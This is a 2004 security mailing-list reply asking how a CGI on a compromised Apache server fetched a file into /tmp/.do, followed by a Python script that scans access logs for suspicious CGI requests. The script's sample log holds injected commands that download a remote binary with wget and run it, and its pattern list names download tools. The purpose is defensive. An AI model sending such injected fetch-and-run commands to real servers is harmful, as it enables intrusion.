
RE: [suse-security] Re: Backdoor over http(s)??

Hi Mark,

I'm not sure I can follow everything concerning this issue. Maybe you
could clarify this somehow so that a n00b like me can follow ;-)

On Tue, 13.01.2004 at 16:20, Retallack, Mark (Siemens) wrote:
> It looks like the source was left on the server (along with other things):

Is this just another compromised machine or the origin? A portscan shows
several open ports and the machine seems to be a Solaris 8 with an
estimated uptime of 33 days according to nmap.

> httpREMOVE://
> Only follow the link if you know what you are doing (and remove the REMOVE
> text)

I don't quite understand why displaying rs.c in a browser window could
be harmful or am I missing something here and this URL initiates
something else inside the browser?

> The rest of the files:
> httpREMOVE://

I've given them a look. Has anybody ever heard of a "pokemon squadron
hacking team"?!

> > > Some CGI at your webserver did run wget to receive some file from
> > > and save it on your disc as "/tmp/.do".

Do you know how this CGI ended up on the machine? By some Apache exploit

> > > wwwrun:nogroup are standard user and group used for apache.

Can such a CGI do any harm by running as this user? Or are CGI scripts
run by Apache initiated by another user?

kind regards,

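On the question above of how a CGI could end up running wget into /tmp/.do: as an added example that is not part of this thread, the Python below scans Apache common-format access log lines for CGI requests whose query string carries a download tool, a shell separator, or a hidden /tmp path. The log lines, script names and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines (not from the original thread).
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2004:15:58:01 +0100] "GET /index.html HTTP/1.1" 200 1024
10.0.0.9 - - [13/Jan/2004:16:02:13 +0100] "GET /cgi-bin/formmail.pl?recipient=x;wget%20http://203.0.113.7/rs%20-O%20/tmp/.do HTTP/1.0" 200 512
10.0.0.9 - - [13/Jan/2004:16:02:20 +0100] "GET /cgi-bin/formmail.pl?cmd=chmod%20755%20/tmp/.do;/tmp/.do HTTP/1.0" 200 88
10.0.0.12 - - [13/Jan/2004:16:05:44 +0100] "POST /cgi-bin/guestbook.cgi HTTP/1.1" 200 300
"""

# Apache common log format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators a CGI query string should not normally carry:
# download tools, shell separators, and hidden files under /tmp.
SUSPICIOUS = re.compile(r'(?:\bwget\b|\bcurl\b|\bfetch\b|/tmp/\.|;|\|)', re.I)


def suspicious_cgi_requests(log_text):
    """Return one record per CGI request whose decoded query matches an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode %20 and friends first; attackers encode the interesting parts.
        url = unquote_plus(m.group('url'))
        path, _, query = url.partition('?')
        if '/cgi-bin/' not in path or not query:
            continue
        indicators = sorted({tok.lower() for tok in SUSPICIOUS.findall(query)})
        if indicators:
            hits.append({'ip': m.group('ip'), 'time': m.group('ts'),
                         'script': path, 'indicators': indicators})
    return hits


if __name__ == '__main__':
    for hit in suspicious_cgi_requests(SAMPLE_LOG):
        print(hit)
```

Run it against the real access_log instead of SAMPLE_LOG; hits from the same client a few seconds apart, like the two formmail.pl lines above, are the pattern to look at first.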